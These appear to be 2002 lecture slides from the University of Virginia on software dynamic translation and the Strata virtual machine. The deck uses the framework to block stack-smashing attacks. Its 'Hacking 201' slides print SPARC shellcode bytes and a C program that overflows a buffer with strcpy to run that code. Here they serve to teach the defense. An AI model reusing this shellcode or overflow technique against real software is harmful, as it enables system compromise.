Applications of Software Dynamic Translation Jack Davidson University of Virginia
advertisement
Applications of
Software Dynamic Translation
Jack Davidson
University of Virginia
February 27, 2002
University of Virginia Department of Computer Science
1
What is SDT?
Software: Implemented using flexible,
software VM
Dynamic: Operates on running
programs
Translation: Modifies some or all of a
program’s instructions before they
execute
University of Virginia Department of Computer Science
2
Software Dynamic Translation
Application
Strata Virtual
Machine
Context Management
Linker
Memory Management
Strata Virtual CPU
Cache Management
Target Interface
Target-specific Functions
Host CPU
University of Virginia Department of Computer Science
3
Why Use SDT?
Improve program performance
Overcome economic barriers
Code decompression
Resource management
Allow one architecture’s binaries to run on another
Application specific ISA improvements
Adapt program to its execution environment
Power, memory footprint, resource protection
Software engineering and quality control
Performance monitoring, fault isolation, debugging
University of Virginia Department of Computer Science
4
Strata
Infrastructure designed for building SDTs
Can be extended to support a wide variety of
SDT applications
Provides:
Platform independent common services
Target interface that abstracts target-specific
support functions
Target-specific support functions
SPARC and MIPS
ARM and x86 (underway)
University of Virginia Department of Computer Science
5
Strata Virtual Machine
Strata Virtual Machine
Context
Capture
New
PC
Cached?
Yes
New
Fragment
Fetch
Decode
Translate
Context
Switch
Finished?
Next PC
Yes
No
Host CPU (Executing Translated Code from Cache)
University of Virginia Department of Computer Science
Base VM
implements a
simple SDT
Programmer
implements new
SDTs by
customizing the VM
VM is customized
by overriding
functions in the
target interface
6
Computer Viruses
Melissa, Code Red, Nimba, I love you
Cost of dealing with viruses is high
Code Red cost $1.2B (USA Today)
Melissa cost $385M (Trusecure Corp)
Most viruses use a buffer overrun
exploit to gain control
University of Virginia Department of Computer Science
7
Spread of Code Red
Animation
University of Virginia Department of Computer Science
8
Hacking 101
Exploit lack of bounds checking in C
programs
Malicious user provides input string that is
actually code
Change return address to jump to
malicious code by overrunning a buffer
Typically use strcpy(), strcat(), sprintf(), etc.
University of Virginia Department of Computer Science
9
Buffer Overrun Attacks
Top of Stack
String Growth
Malicious Code
NOP
NOP
NOP
Return Address
Local Variables
Stack Growth
Buffer
University of Virginia Department of Computer Science
10
Hacking 201
#include <stdio.h>
char shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x81\xc7\xe0\x08\x83\xe8\x40\x01";
University of Virginia Department of Computer Science
11
Hacking 201
void trustme (void) {
unsigned buffer[24];
printf("Evil buffer lives at %08x\n", buffer);
long_ptr = (long *)large_string;
for (i=0; i<44; i++)
*(long_ptr+i) = ((int)buffer) - 8;
for (i=0; i<(int)strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy((char *)buffer, large_string);
return;
}
void naive (void) {
trustme();
return;
/* This should execute the injected code. */
}
void main (int argc, char *argv[]) {
naive();
printf("Nothing bad happened!\n");
}
University of Virginia Department of Computer Science
12
Stopping Viruses with Strata
Host CPU and OS
Allowed action
Strata
Denied action Virus
University of Virginia Department of Computer Science
13
Preventing Stack Smashing
Attacks with Strata
Override fetch
TI = SPARC_TI;
TI.fetch = my_fetch;
insn_t my_fetch (iaddr_t PC)
{
if (in_stack(PC))
strata_fatal(“Smash!”);
else
(*SPARC_TI.fetch)(PC);
}
University of Virginia Department of Computer Science
14
Strata Security API
With the security API a user can specify
and implement security policies
Prevent suid programs from exec’ing a
shell
Filter URLs
Sandbox file system
Prevent writes to specified files (e.g.,
registry)
Produce audit trails
University of Virginia Department of Computer Science
15
